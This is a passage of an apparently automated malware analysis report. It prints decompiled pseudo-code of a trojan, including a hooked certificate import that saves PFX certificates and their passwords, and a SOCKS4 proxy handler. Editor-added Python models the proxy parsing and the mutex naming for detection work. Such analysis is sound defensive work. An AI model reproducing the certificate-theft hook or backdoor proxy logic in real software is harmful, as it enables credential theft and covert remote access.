    				if(E00416492( &_v408, 0x422bb8, 0x10) != 0) {
    					L7:
    					_t22 = 0;
    				} else {
    					_t38 =  *0x42299c; // 0x0
    					_a4 = E00416F70(_t38);
    					_t35 = E00416F70(0x4229a0);
    					E0041662C(_t24 | 0xffffffff,  &_v134,  &_v44, 0, 0x14);
    					if(_a4 <= _t35) {
    						goto L7;
    					} else {
    						_t27 =  *0x42299c; // 0x0
    						_t47 = _t35 + _t35;
    						if( *((short*)(_t47 + _t27)) != 0x5c || StrCmpNIW(0x4229a0, _t27, _t35) != 0) {
    							goto L7;
    						} else {
    							_t29 =  *0x42299c; // 0x0
    							if(lstrcmpiW( &_v44, _t47 +  &(_t29[1])) != 0) {
    								goto L7;
    							} else {
    								_t22 = 1;
    							}
    						}
    					}
    				}
    				return _t22;
    			}

    APIs
      • Part of subcall function 0041662C: MultiByteToWideChar.KERNEL32(00406B14,00000000,?,00406293,?,?,00406B14,00000000,00000032,77E49EB0,?,00000000), ref: 00416643
    • StrCmpNIW.SHLWAPI(004229A0,00000000,00000000,00000000,00000014,00000010,?,00422BC8,?,000001E6,36D62AA8,?,000000B7), ref: 0040EB84
    • lstrcmpiW.KERNEL32(?,?), ref: 0040EB9C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: ByteCharMultiWidelstrcmpi
    • String ID: Cy$Zy
    • API String ID: 1977948566-282925538
    • Opcode ID: df8e3b763628234723dcedb259841dc47894689b7e1a56a0eea09a09b6e8d1a8
    • Instruction ID: 88c7da47f3007232b4d115a3e4e86d71e8b8f5ef09cb54b84c447fc4a059bd67
    • Opcode Fuzzy Hash: df8e3b763628234723dcedb259841dc47894689b7e1a56a0eea09a09b6e8d1a8
    • Instruction Fuzzy Hash: 5A119371710118ABDF20EF61DC45EEA77BCAB94354F80843AF901A7191D678E982CB6D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00419B8E(HANDLE* _a4) {
    				struct tagMSG _v28;
    				long _t16;
    
    				while(1) {
    					_t16 = MsgWaitForMultipleObjects(1, _a4, 0, 0xffffffff, 0x4ff); // INFINITE timeout, QS_ALLINPUT: wake on the handle or on any queued message
    					if(_t16 != 1) {
    						break;
    					}
    					while(PeekMessageW( &_v28, 0, 0, 0, 1) != 0) {
    					if(_v28.message != 0x12) { // 0x12 == WM_QUIT
    							TranslateMessage( &_v28);
    							DispatchMessageW( &_v28);
    							continue;
    						}
    						goto L5;
    					}
    				}
    				L5:
    				return _t16;
    			}

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: MessageMultipleObjectsPeekWait
    • String ID:
    • API String ID: 3986374578-0
    • Opcode ID: 041a5962bd488d86ce0dab827f1c0ad8680bc075ff408f9c6d719008b6bf173b
    • Instruction ID: 8091aa7603a11f3deda56e2aa14124edef0b3f71fe2324812c94375264362125
    • Opcode Fuzzy Hash: 041a5962bd488d86ce0dab827f1c0ad8680bc075ff408f9c6d719008b6bf173b
    • Instruction Fuzzy Hash: 8EF0FC321082096BD710AA99EC48DA7BBECFB45394F04057AF611E3171D176EC448775
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004159EE(void* __eflags) {
    				void* _t1;
    				long _t6;
    				void* _t12;
    
    				_t1 = E0040679A(_t12, 0x19367401, 1);
    				_t19 = _t1;
    				if(_t1 != 0) {
    					if(E004068C0() == 0) {
    						L7:
    						E00419BF4(_t19);
    						return 0;
    					}
    				SetThreadPriority(GetCurrentThread(), 0xfffffff1); // THREAD_PRIORITY_IDLE (-15)
    				_t6 = WaitForSingleObject( *0x422e04, 0x1388); // 5000 ms
    				while(_t6 == 0x102) { // WAIT_TIMEOUT: run E0041CB9B every 5 s until the event at 0x422e04 is signalled
    						E0041CB9B();
    						_t6 = WaitForSingleObject( *0x422e04, 0x1388);
    					}
    					goto L7;
    				}
    				return _t1 + 1;
    			}

    APIs
      • Part of subcall function 0040679A: CreateMutexW.KERNEL32(00422978,00000000,?,?,?,?,?), ref: 004067BB
    • GetCurrentThread.KERNEL32 ref: 00415A12
    • SetThreadPriority.KERNEL32(00000000,?,?,?,19367401,00000001), ref: 00415A19
    • WaitForSingleObject.KERNEL32(00001388,?,?,?,19367401,00000001), ref: 00415A31
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Thread$CreateCurrentMutexObjectPrioritySingleWait
    • String ID:
    • API String ID: 3441234504-0
    • Opcode ID: 4b0a058b1a23762436f824c60ea21feaec8000a93c947a722ec8ea9b6060fa5b
    • Instruction ID: d434c60f3197cb6623957fa7470462ab1d7e9e4ff712be999bfed4d4ae138995
    • Opcode Fuzzy Hash: 4b0a058b1a23762436f824c60ea21feaec8000a93c947a722ec8ea9b6060fa5b
    • Instruction Fuzzy Hash: A7F05972540208BEEA1137A4AEC5DDB3E0DDF843EC7100233F501B2262C6BD4C8241B8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E0040E262(void* __eflags, signed int _a4) {
    				char _v9;
    				char _v13;
    				char _v20;
    				signed int _v24;
    				signed int _v29;
    				short _v31;
    				signed char _v32;
    				intOrPtr _v36;
    				signed int _v48;
    				short _v50;
    				char _v52;
    				char _v312;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t59;
    				void* _t61;
    				short _t77;
    				void* _t79;
    				void* _t84;
    				char _t103;
    				char* _t105;
    				signed int _t115;
    				void* _t125;
    				intOrPtr _t126;
    				void* _t127;
    				char _t129;
    				void* _t131;
    				intOrPtr _t132;
    				void* _t133;
    
    				_t110 = _a4;
    				_t59 = E004199D9(_t110);
    				_push(0);
    				_push( &_v32);
    				_t61 = 7;
    				_v24 = 0 | _t59 == 0x00000017; // 0x17 == AF_INET6: flag set when the local socket is IPv6
    				if(E004193D4(_t61, _t110) != 0) {
    					while(E004193D4(1, _t110,  &_v9, 0) != 0) {
    						if(_v9 == 0) {
    							_t115 = _v29;
    							_t116 = _t115 << 0x10;
    							_v13 = 0x5a; // SOCKS4 reply code 0x5a: request granted (0x5b below: rejected or failed)
    							if(((_t115 & 0x00ff0000 | _t115 >> 0x00000010) >> 0x00000008 | (_t115 & 0x0000ff00 | _t115 << 0x00000010) << 0x00000008) - 1 > 0xfe) { // byte-swapped DSTIP outside 0.0.0.1..0.0.0.255: plain SOCKS4, no host name follows
    								L20:
    								_v9 = 1;
    								if(_v13 != 0x5a) {
    									L44:
    									return E0040E1EC(_t110, 0xffffffff, _v13, _v24) & 0xffffff00 | _t73 != 0x00000000;
    								}
    								E004164D4( &_v52,  &_v52, 0, 0x10);
    								_t77 = 2;
    								_v52 = _t77; // sockaddr_in.sin_family = AF_INET
    								_t79 = (_v32 & 0x000000ff) - 1;
    								if(_t79 == 0) {
    									_v50 = _v31;
    									_v48 = _v29;
    									_t127 = E00419469( &_v52);
    									if(_t127 == 0xffffffff) {
    										L23:
    										_v13 = 0x5b;
    										goto L44;
    									}
    									E0041981C(_t116, _t127);
    									_t84 = E0040E1EC(_t110, _t127, 0x5a, _v24);
    									if(_t84 != 1) {
    										if(_t84 != 0xffffffff) {
    											_v9 = 0;
    										} else {
    											_v13 = 0x5b;
    										}
    									} else {
    										_push(_t127);
    										_t84 = E0041961D(_t110);
    									}
    									E004197C4(_t84, _t127);
    									if(_v9 != 1 || _v13 == 0x5a) {
    										L34:
    										return _v9;
    									} else {
    										goto L44;
    									}
    								}
    								if(_t79 == 1) {
    									_t129 = E00419563( &_v52, 1);
    									_v20 = _t129;
    									if(_t129 == 0xffffffff) {
    										goto L23;
    									}
    									_t125 = E0040E1EC(_t110, _t129, 0x5a, _v24);
    									if(_t125 != 1) {
    										L31:
    										E004197C4(_t89, _t129);
    										if(_t125 == 0xffffffff) {
    											goto L23;
    										}
    										if(_t125 != 1) {
    											_v9 = 0;
    										}
    										goto L34;
    									}
    									_t126 = E00419794( &_v20,  &_a4);
    									_v36 = _t126;
    									E004197C4(_t93, _v20);
    									if(_t126 != 0xffffffff) {
    										E0041981C(_t116, _t126);
    										_t110 = _a4;
    										_t125 = E0040E1EC(_a4, _t126, 0x5a, _v24 | 0x00000002);
    										if(_t125 == 1) {
    											_push(_v36);
    											_t89 = E0041961D(_t110);
    										}
    										_t129 = _v36;
    										goto L31;
    									}
    									_t110 = _a4;
    									_v13 = 0x5b;
    									goto L44;
    								}
    								goto L23;
    							}
    							_t131 = 0;
    							while(1) {
    								_t116 = _t110;
    								if(E004193D4(1, _t110,  &_v9, 0) == 0) {
    									goto L1;
    								}
    								_t103 = _v9;
    								 *((char*)(_t133 + _t131 - 0x134)) = _t103;
    								if(_t103 == 0) {
    									_t105 =  &_v312;
    									_v20 = 0;
    									__imp__getaddrinfo(_t105, 0, 0,  &_v20);
    									if(_t105 == 0) {
    										_t132 = _v20;
    										while(_t132 != 0) {
    											if( *((intOrPtr*)(_t132 + 4)) == 2) { // ADDRINFOW.ai_family == AF_INET
    												E0041645D( &_v29,  *((intOrPtr*)(_t132 + 0x18)) + 4, 4); // copy sin_addr from ai_addr (+0x18) into DSTIP
    												L19:
    												__imp__freeaddrinfo(_v20);
    												if(_t132 == 0) {
    													goto L12;
    												}
    												goto L20;
    											}
    											_t132 =  *((intOrPtr*)(_t132 + 0x1c)); // ai_next
    										}
    										goto L19;
    									}
    									L12:
    									_v13 = 0x5b;
    									goto L20;
    								}
    								_t131 = _t131 + 1;
    								if(_t131 <= 0xff) {
    									continue;
    								}
    								goto L1;
    							}
    							goto L1;
    						}
    					}
    				}
    				L1:
    				return 0;
    			}

    APIs
      • Part of subcall function 004199D9: getsockname.WS2_32(?,?,?), ref: 004199F7
    • getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 0040E331
    • freeaddrinfo.WS2_32(?,?,?,00000004), ref: 0040E36A
      • Part of subcall function 0041981C: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 00419832
      • Part of subcall function 0040E1EC: getpeername.WS2_32(000000FF,?,?), ref: 0040E210
      • Part of subcall function 0041961D: select.WS2_32(00000000,00000001,00000000,00000000,00000000), ref: 004196BD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: freeaddrinfogetaddrinfogetpeernamegetsocknameselectsetsockopt
    • String ID: Z
    • API String ID: 1849152701-1505515367
    • Opcode ID: a5eecf883ce6ed4f2c3b0c2ba936ab7e90df7257c14824027f149b3f90b6fefb
    • Instruction ID: 828ea8a3e819b9e2e630089770e81e5f2174330aea6fdfa25adb7846d87537b5
    • Opcode Fuzzy Hash: a5eecf883ce6ed4f2c3b0c2ba936ab7e90df7257c14824027f149b3f90b6fefb
    • Instruction Fuzzy Hash: 23615D71E00154AADF20EAA6CC01AEFBBB99F45314F08497BF911F32C2C67C9951D76A
    Uniqueness

    Uniqueness Score: -1.00%
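The routine E0040E262 above reads a 7-byte header (command, port, address), a NUL-terminated user id and, when the address is 0.0.0.x, a NUL-terminated host name that it resolves with getaddrinfo; it answers with 0x5a on success and 0x5b on failure, then connects (command 1) or listens and accepts (command 2) before relaying. Reading this as a SOCKS4/SOCKS4a handler is the editor's interpretation of those constants, not a statement from the report, and the version byte is assumed to have been consumed by the caller. The following parser is an added example written from the decompilation, not code from the sample or from Joe Sandbox; getaddrinfo is replaced by a constructed lookup table so it runs offline, and the relay step is not reproduced.

```python
"""
Added example (not from the sample or the report): parser for the request
body consumed by E0040E262, modelled on the decompilation.
"""
from __future__ import annotations

import struct
from dataclasses import dataclass
from typing import Optional

SOCKS4_CONNECT = 1          # _v32 - 1 == 0 branch: connect(), then relay
SOCKS4_BIND = 2             # _v32 - 1 == 1 branch: listen(), accept(), then relay
REPLY_GRANTED = 0x5A        # initial value of _v13
REPLY_REJECTED = 0x5B       # _v13 on every failure path
MAX_HOSTNAME = 0xFF         # the read loop gives up after 0x100 bytes without a NUL

# Constructed stand-in for getaddrinfo(); the sample only uses AF_INET results.
FAKE_RESOLVER: dict[bytes, str] = {b"example.test": "192.0.2.10"}


@dataclass
class Socks4Request:
    command: int
    port: int
    ip: str                    # DSTIP as a dotted quad
    userid: bytes
    hostname: Optional[bytes]  # present only for SOCKS4a requests


def is_socks4a_marker(ip_bytes: bytes) -> bool:
    """Mirror of the byte-swap test in the decompilation: DSTIP arrives
    big-endian; after swapping to host order, (ip - 1) > 0xfe as unsigned
    fails exactly for 0.0.0.1 .. 0.0.0.255, the 'host name follows' marker."""
    ip_host = struct.unpack(">I", ip_bytes)[0]
    return ((ip_host - 1) & 0xFFFFFFFF) <= 0xFE


def _read_cstring(buf: bytes, pos: int, max_len: int) -> tuple[bytes, int]:
    """NUL-terminated field starting at pos, at most max_len bytes before the NUL."""
    end = buf.find(b"\x00", pos, pos + max_len + 1)
    if end < 0:
        raise ValueError("unterminated or over-long string")
    return buf[pos:end], end + 1


def parse_socks4_request(payload: bytes) -> Socks4Request:
    """payload is everything after the SOCKS version byte."""
    if len(payload) < 7:
        raise ValueError("short request")
    command, port = struct.unpack(">BH", payload[:3])   # CD, DSTPORT (network order)
    ip_bytes = payload[3:7]                              # DSTIP
    userid, pos = _read_cstring(payload, 7, len(payload))
    hostname = None
    if is_socks4a_marker(ip_bytes):
        hostname, pos = _read_cstring(payload, pos, MAX_HOSTNAME)
    return Socks4Request(command, port, ".".join(str(b) for b in ip_bytes), userid, hostname)


def build_reply(code: int, port: int = 0, ip: str = "0.0.0.0") -> bytes:
    """8-byte SOCKS4 reply: VN=0, CD, DSTPORT, DSTIP."""
    return struct.pack(">BBH4B", 0, code, port, *(int(o) for o in ip.split(".")))


def handle_request(payload: bytes,
                   resolver: dict[bytes, str] = FAKE_RESOLVER) -> tuple[bytes, Optional[tuple[str, int]]]:
    """Return (reply, (target ip, port)) or (rejection, None), following the
    decision order of E0040E262: parse, resolve a 4a host name to IPv4,
    then accept only CONNECT or BIND."""
    try:
        req = parse_socks4_request(payload)
    except ValueError:
        return build_reply(REPLY_REJECTED), None
    target_ip = req.ip if req.hostname is None else resolver.get(req.hostname)
    if target_ip is None or req.command not in (SOCKS4_CONNECT, SOCKS4_BIND):
        return build_reply(REPLY_REJECTED), None
    # The sample fills the granted reply from getpeername(); echoing the target is a simplification.
    return build_reply(REPLY_GRANTED, req.port, target_ip), (target_ip, req.port)
```

Feeding captured request bytes into handle_request() shows which reply the bot would have sent and which destination it would have connected to or bound for; the listening side of that BIND path is what the "open a port and listen for incoming connection" signature in the report refers to.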

    C-Code - Quality: 60%
    			E0040C277(intOrPtr __eax, void* __ecx, intOrPtr* _a4, intOrPtr* _a8, signed int _a12) {
    				char _v536;
    				char _v600;
    				char _v728;
    				char _v744;
    				struct _SYSTEMTIME _v760;
    				intOrPtr _v764;
    				intOrPtr _v772;
    				intOrPtr _v776;
    				char _v784;
    				void* __edi;
    				void* __esi;
    				void* _t47;
    				void* _t58;
    				intOrPtr* _t59;
    				void* _t61;
    				void* _t65;
    				intOrPtr* _t66;
    				void* _t67;
    				void* _t71;
    				char* _t74;
    				signed int _t76;
    				void* _t78;
    				void* _t79;
    
    				_t61 = __ecx;
    				_t78 = (_t76 & 0xfffffff8) - 0x2fc;
    				_t59 = _a4;
    				__imp__PFXImportCertStore(_t59, _a8, _a12, _t67, _t71, _t58); // _a4: CRYPT_DATA_BLOB* (cbData at +0, pbData at +4), _a8: password, _a12: flags; the real import runs first and its result is returned unchanged
    				_v776 = __eax;
    				if(__eax != 0 && (_a12 & 0x10000000) == 0 && _t59 != 0 &&  *_t59 > 0 &&  *((intOrPtr*)(_t59 + 4)) != 0 && E004068C0() != 0) { // only a successful import of a non-empty blob is recorded below, together with the password (written under a ".txt" name)
    					GetSystemTime( &_v760);
    					E004159A4(0xaa,  &_v600);
    					_t74 =  &_v744;
    					E004159A4(0xab, _t74);
    					E0040C056( &_v536, _t61);
    					_push(_v760.wYear & 0x0000ffff);
    					_push(_v760.wMonth & 0x0000ffff);
    					_push(_v760.wDay & 0x0000ffff);
    					_push(_t74);
    					_push( &_v536);
    					_push( &_v600);
    					_t65 = 0x3e;
    					_t47 = E00417114( &_v600, _t65,  &_v728);
    					_t79 = _t78 + 0x18;
    					if(_t47 > 0 && E004056A7(_t61, _t65, 2, 0,  &_v728,  *((intOrPtr*)(_t59 + 4)),  *_t59) != 0) {
    						_t66 = _a8;
    						if(_t66 != 0 &&  *_t66 != 0) {
    							 *((short*)(E0041645D(_t79 + 0x48 + E00416F70( &_v728) * 2, L".txt", 8) + 8)) = 0;
    							_t64 = _t66;
    							if(E00417278(_t52 | 0xffffffff, _t66,  &_v784) != 0) {
    								E004056A7(_t64, _t66, 2, 0,  &_v728, _v772, _v764);
    								E00417266( &_v784);
    							}
    						}
    					}
    				}
    				return _v776;
    			}

    APIs
    • PFXImportCertStore.CRYPT32(?,?,?), ref: 0040C290
      • Part of subcall function 004068C0: WaitForSingleObject.KERNEL32(00000000,0041D437), ref: 004068C8
    • GetSystemTime.KERNEL32(?), ref: 0040C2DC
      • Part of subcall function 0040C056: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,0040C1AD,?,?,00000000), ref: 0040C06B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CertImportNameObjectSingleStoreSystemTimeUserWait
    • String ID: .txt
    • API String ID: 1412380219-2195685702
    • Opcode ID: 6eeb37572300eb1af63f343d31534b19375fc5fff73d56938630278e8d576784
    • Instruction ID: 830d084734f3d208e6edac3c1eb0bc641a42a1be845fefad38999a26797a3478
    • Opcode Fuzzy Hash: 6eeb37572300eb1af63f343d31534b19375fc5fff73d56938630278e8d576784
    • Instruction Fuzzy Hash: 3031A331104351DBCB20EF55CE81BAB77A8EF88304F04462BBE98A72E1DB79D945C766
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CoCreateInstance.OLE32(00403718,00000000,00004401,00403728,?,?,00000000,00000001), ref: 004127EA
    • CoCreateInstance.OLE32(004036E8,00000000,00004401,004036F8,?,?,00000000,00000001), ref: 0041283D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CreateInstance
    • String ID: D
    • API String ID: 542301482-2746444292
    • Opcode ID: 9f8e14bf4a76a0dbb43b2e3770b7056a2c4ea794c618d9c969596466511f67c6
    • Instruction ID: bb01168a003f90e28e99fd41c14ffeb896fa340f48e2b69d67118d7307f3f16c
    • Opcode Fuzzy Hash: 9f8e14bf4a76a0dbb43b2e3770b7056a2c4ea794c618d9c969596466511f67c6
    • Instruction Fuzzy Hash: 66318BB2204206AFE710DF64CD85DABB7ECAF84744F00062EF954D7290E7B5DC568BA6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041CD26(void* __ecx, intOrPtr _a4) {
    				signed int _v8;
    				void* _v12;
    				char _v16;
    				char _v364;
    				char _v504;
    				void* __edi;
    				signed int _t17;
    				signed int _t18;
    				int _t29;
    				void* _t35;
    
    				if( *0x423f60 == 0) {
    					E00406B47(0x423f48, __ecx, 2, 0x423f60);
    				}
    				_v8 = _v8 & 0x00000000;
    				_t31 =  &_v12;
    				_t29 = 0;
    				_v12 = 0x80000001;
    				_t17 = RegOpenKeyExW(0x80000001, 0x423f60, 0, 1,  &_v12); // HKEY_CURRENT_USER, KEY_QUERY_VALUE
    				if(_t17 != 0) {
    					_t18 = _t17 | 0xffffffff;
    				} else {
    					_t18 = E0041A6F4( &_v12, 0x423f48,  &_v16,  &_v8);
    				}
    				_t35 = 0x74;
    				if(_t18 == 0xffffffff) {
    					L10:
    					return E004164D4(_t18, _a4, 0, _t35);
    				}
    				if(_v16 == 3 && _t18 >= _t35) { // REG_BINARY value of at least 0x74 (116) bytes
    					E0041645D(_a4, _v8, _t35);
    					E00406A66(_t31,  &_v504);
    					E0041789D( &_v364, _t31, _a4, _t35);
    					_t29 = 1;
    				}
    				_t18 = E00416421(_v8);
    				if(_t29 == 0) {
    					goto L10;
    				}
    				return _t18;
    			}

    APIs
    • RegOpenKeyExW.ADVAPI32(80000001,00423F60,00000000,00000001,?,?,74B5F560,00000000), ref: 0041CD68
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Open
    • String ID: H?B$`?B
    • API String ID: 71445658-2585568248
    • Opcode ID: 8af1f4f2f83393f953a6ec64d8da8cc1892d4b7ae559e01b8d61044811df280e
    • Instruction ID: 3024f29345cf7a417e6f906543a30ec7546f20ce1fa6350045979692f4563005
    • Opcode Fuzzy Hash: 8af1f4f2f83393f953a6ec64d8da8cc1892d4b7ae559e01b8d61044811df280e
    • Instruction Fuzzy Hash: DB11CD32A80118B6CB20AAA5ED85FDF7F789F01364F104176F104A20E0D7789A85CAA8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 63%
    			E0041AA7A(void* __ecx, intOrPtr _a4, intOrPtr _a12, signed char _a16) {
    				char _v268;
    				char _v280;
    				char _v284;
    				signed int _v290;
    				signed int _v292;
    				signed int _v296;
    				unsigned int _t24;
    				void* _t26;
    				signed int _t28;
    				char* _t29;
    				void* _t30;
    				void* _t41;
    				char* _t42;
    				void* _t46;
    				signed int _t50;
    				void* _t51;
    				signed int _t52;
    				void* _t54;
    
    				_t54 = (_t52 & 0xfffffff8) - 0x118;
    				_t46 = __ecx;
    				_t24 = E0041645D( &_v284, _a4, 0x10);
    				_v296 = _v296 ^ _t24;
    				_v292 = _v292 ^ _t24;
    				_v290 = _v290 ^ _t24 >> 0x00000010;
    				_t41 = 0;
    				_t26 = 0;
    				do {
    					 *(_t54 + _t41 + 0x10) =  *(_t54 + _t41 + 0x10) ^  *(_t51 + _t26 + 0xc);
    					_t26 = _t26 + 1;
    					if(_t26 == 4) {
    						_t26 = 0;
    					}
    					_t41 = _t41 + 1;
    				} while (_t41 < 8);
    				if(_a12 != 0) {
    					E0041645D( &_v268, _a12, 0x102);
    					E0041789D( &_v280, _t41,  &_v296, 0x10);
    				}
    				_t28 = _a16 & 0x000000ff;
    				if(_t28 != 0) {
    					_t30 = _t28 - 1;
    					if(_t30 == 0) {
    						_t42 = L"Local\\";
    						_push(6);
    						goto L11;
    					} else {
    						if(_t30 == 1) {
    							_t42 = L"Global\\";
    							_push(7);
    							L11:
    							_pop(_t50);
    							E004167C2(_t50, _t42, _t46);
    							_t46 = _t46 + _t50 * 2;
    						}
    					}
    				}
    				_t29 =  &_v284;
    				__imp__StringFromGUID2(_t29, _t46, 0x28); // format the 16 bytes as {XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX} into a 40-WCHAR buffer, after the optional Local\ or Global\ prefix
    				return _t29;
    			}

    APIs
    • StringFromGUID2.OLE32(?,2937498D,00000028,?,?,00000010,00000000,77E49EB0), ref: 0041AB20
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: FromString
    • String ID: Global\$Local\
    • API String ID: 1694596556-639276846
    • Opcode ID: 439d1fedfea8792139d508c67cf26143e6b307d0adf75bd9b1b4c8e1581f8674
    • Instruction ID: d00c6c5a300621070014e47ba4eff8d214a100805a3179d4f3ecc248b705ecdb
    • Opcode Fuzzy Hash: 439d1fedfea8792139d508c67cf26143e6b307d0adf75bd9b1b4c8e1581f8674
    • Instruction Fuzzy Hash: 9511263221834967C714EE749809BEB37A9EF84714F00892FF691D61C1DBBCD1A5C79A
    Uniqueness

    Uniqueness Score: -1.00%
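E0041AA7A above turns a 16-byte value into a kernel object name: it copies the seed, mixes it, optionally feeds a string through E0041789D, prepends Local\ (_a16 == 1) or Global\ (_a16 == 2), and formats the result with StringFromGUID2. The report does not resolve the mixing step or E0041789D, so the added example below reproduces only the part that is certain, the StringFromGUID2 formatting and its inverse, so that a seed dumped from memory can be turned into the exact name to look for in a mutex or event listing and a name seen on a host can be turned back into raw bytes. This is editor-written code, not code from the sample or the report; where a salt string is supplied it substitutes MD5 as a labelled placeholder for the unresolved helper.

```python
"""
Added example (not from the sample or the report): reproduce the object-name
formatting performed by E0041AA7A and parse such names back to bytes.
"""
from __future__ import annotations

import hashlib
import re
import uuid

# Namespace selector values used by E0041AA7A (_a16): 1 -> Local\, 2 -> Global\
NAMESPACE_PREFIX = {0: "", 1: "Local\\", 2: "Global\\"}
STRING_FROM_GUID2_CCH = 0x28   # buffer length the sample passes to StringFromGUID2

_NAME_RE = re.compile(
    r"^(?:(Local|Global)\\)?"
    r"\{([0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12})\}$")


def format_guid(raw16: bytes) -> str:
    """Text StringFromGUID2 produces for 16 bytes of GUID memory: Data1..Data3
    are read little-endian, the trailing 8 bytes are emitted in order."""
    if len(raw16) != 16:
        raise ValueError("GUID must be 16 bytes")
    text = "{" + str(uuid.UUID(bytes_le=raw16)).upper() + "}"
    if len(text) + 1 > STRING_FROM_GUID2_CCH:   # must fit with the terminating NUL
        raise AssertionError("formatted GUID does not fit the sample's buffer")
    return text


def derive_object_name(seed16: bytes, namespace: int, salt: bytes | None = None) -> str:
    """Name the sample would build from seed16 for the given namespace selector."""
    material = seed16
    if salt is not None:
        # PLACEHOLDER: the sample's mixing via E0041789D is unresolved in the
        # report; MD5(salt || seed) stands in only to keep the call shape.
        material = hashlib.md5(salt + seed16).digest()
    return NAMESPACE_PREFIX[namespace] + format_guid(material)


def candidate_names(seed16: bytes) -> list[str]:
    """All three namespace variants, for matching against an object listing."""
    return [derive_object_name(seed16, ns) for ns in sorted(NAMESPACE_PREFIX)]


def parse_object_name(name: str) -> tuple[int, bytes] | None:
    """Inverse: (namespace selector, raw 16 bytes), or None if the name
    does not have the shape produced by E0041AA7A."""
    m = _NAME_RE.match(name)
    if not m:
        return None
    ns = {None: 0, "Local": 1, "Global": 2}[m.group(1)]
    return ns, uuid.UUID(m.group(2)).bytes_le
```

The little-endian handling in format_guid is the detail that bites when comparing dumped bytes with names from a tool such as a handle viewer: the first three fields appear byte-reversed relative to memory, so a naive hex dump of the seed will not match the name even though it is the same 16 bytes.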

    C-Code - Quality: 79%
    			E00414519(void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v52;
    				char _v572;
    				void* __edi;
    				void* __esi;
    				char* _t22;
    				signed int _t30;
    				char* _t32;
    				void* _t34;
    
    				_t32 =  &_v52;
    				E004159A4(0x81, _t32);
    				_v16 = _t32;
    				_v28 = 0x26; // CSIDL_PROGRAM_FILES
    				_v24 = 0x1a; // CSIDL_APPDATA
    				_v20 = 0x23; // CSIDL_COMMON_APPDATA
    				E004164D4( &_v12,  &_v12, 0, 8);
    				_t30 = 0;
    				do {
    					_t22 =  &_v572;
    					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
    					_t37 = _t22;
    					if(_t22 == 0) {
    						_t29 =  &_v16;
    						E0041BB58( &_v572,  &_v16, _t37, 1, 2, E0041427E,  &_v12, 0, 0, 0);
    					}
    					_t30 = _t30 + 1;
    				} while (_t30 < 3);
    				if(_v8 <= 0) {
    					return E00416421(_v12);
    				}
    				return E0041252D(_t29, _v12, 0xcb);
    			}

    APIs
